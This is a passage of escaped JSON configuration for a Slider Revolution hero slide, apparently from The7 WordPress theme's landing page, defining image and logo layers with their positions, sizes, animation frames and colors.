4px\"},\"m\":{\"v\":\"-154px\"}},\"y\":{\"d\":{\"v\":\"-237px\",\"e\":true},\"n\":{\"v\":\"-237px\"},\"t\":{\"v\":\"-237px\"},\"m\":{\"v\":\"-237px\"}},\"horizontal\":{\"d\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"zIndex\":9,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":300},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-100px\"},\"n\":{\"v\":\"-100px\"},\"t\":{\"v\":\"-100px\"},\"m\":{\"v\":\"-100px\"}},\"y\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":300,\"startRelative\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":300,\"startRelative\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":7700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"effects\":{\"parallax\":\"1\"},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.4.0\"},\"16\":{\"text\":\"Image 16\",\"alias\":\"1r\",\"uid\":16,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/revslider\\/the7-landing-hero-image\\/r-1-tiny.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"1182px\",\"e\":true},\"n\":{\"v\":\"1182px\"},\"t\":{\"v\":\"1182px\"},\"m\":{\"v\":\"1182px\"}},\"height\":{\"d\":{\"v\":\"928px\",\"e\":true},\"n\":{\"v\":\"928px\"},\"t\":{\"v\":\"928px\"},\"m\":{\"v\":\"928px\"}},\"originalWidth\":1182,\"originalHeight\":928,\"aspectRatio\":{\"d\":{\"v\":1.2737068965517},\"n\":{\"v\":1.2737068965517},\"t\":{\"v\":1.2737068965517},\"m\":{\"v\":1.2737068965517}}},\"position\":{\"x\":{\"d\":{\"v\":\"-169px\",\"e\":true},\"n\":{\"v\":\"-169px\"},\"t\":{\"v\":\"-169px\"},\"m\":{\"v\":\"-169px\"}},\"y\":{\"d\":{\"v\":\"-162px\",\"e\":true},\"n\":{\"v\":\"-162px\"},\"t\":{\"v\":\"-162px\"},\"m\":{\"v\":\"-162px\"}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"zIndex\":10,\"position\":\"relative\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":300},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"y\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":300,\"startRelative\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":300,\"startRelative\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":7700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"effects\":{\"parallax\":\"1\"},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.4.0\"},\"22\":{\"text\":\"Image 19\",\"alias\":\"Mob-img\",\"uid\":22,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/revslider\\/the7-landing-hero-image\\/art-m-tiny.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"1024px\",\"e\":true},\"n\":{\"v\":\"1024px\"},\"t\":{\"v\":\"1024px\",\"e\":true},\"m\":{\"v\":\"1024px\"}},\"height\":{\"d\":{\"v\":\"350px\",\"e\":true},\"n\":{\"v\":\"350px\"},\"t\":{\"v\":\"350px\",\"e\":true},\"m\":{\"v\":\"350px\"}},\"originalWidth\":1024,\"originalHeight\":350,\"aspectRatio\":{\"d\":{\"v\":2.9257142857143},\"n\":{\"v\":2.9257142857143},\"t\":{\"v\":2.9257142857143},\"m\":{\"v\":2.9257142857143}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-3px\",\"e\":true},\"n\":{\"v\":\"-3px\"},\"t\":{\"v\":\"-3px\",\"e\":true},\"m\":{\"v\":\"-3px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\"}},\"zIndex\":11,\"position\":\"relative\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":300},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":300,\"startRelative\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":300,\"startRelative\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":7700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"d\":false,\"n\":false},\"type\":\"image\",\"version\":\"6.4.0\"},\"11\":{\"text\":\"Group11\",\"alias\":\"LOGO\",\"uid\":11,\"size\":{\"width\":{\"d\":{\"v\":\"900px\",\"e\":true},\"n\":{\"v\":\"900px\"},\"t\":{\"v\":\"900px\",\"e\":true},\"m\":{\"v\":\"900px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"700px\",\"e\":true},\"n\":{\"v\":\"700px\"},\"t\":{\"v\":\"700px\",\"e\":true},\"m\":{\"v\":\"700px\",\"e\":true}},\"originalWidth\":87,\"originalHeight\":87,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-80px\",\"e\":true},\"n\":{\"v\":\"-80px\"},\"t\":{\"v\":\"-140px\",\"e\":true},\"m\":{\"v\":\"-140px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":12,\"position\":\"relative\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":12,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":3000,\"start\":100,\"startRelative\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":3000,\"start\":100,\"startRelative\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":5900,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"group\",\"version\":\"6.4.0\"},\"2\":{\"text\":\"7\",\"alias\":\"7\",\"uid\":2,\"size\":{\"width\":{\"d\":{\"e\":true}},\"height\":{\"d\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"2px\",\"e\":true},\"n\":{\"v\":\"2px\"},\"t\":{\"v\":\"2px\"},\"m\":{\"v\":\"2px\"}},\"y\":{\"d\":{\"v\":\"-197px\",\"e\":true},\"n\":{\"v\":\"-197px\"},\"t\":{\"v\":\"-197px\"},\"m\":{\"v\":\"-197px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":13,\"position\":\"relative\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":13,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim 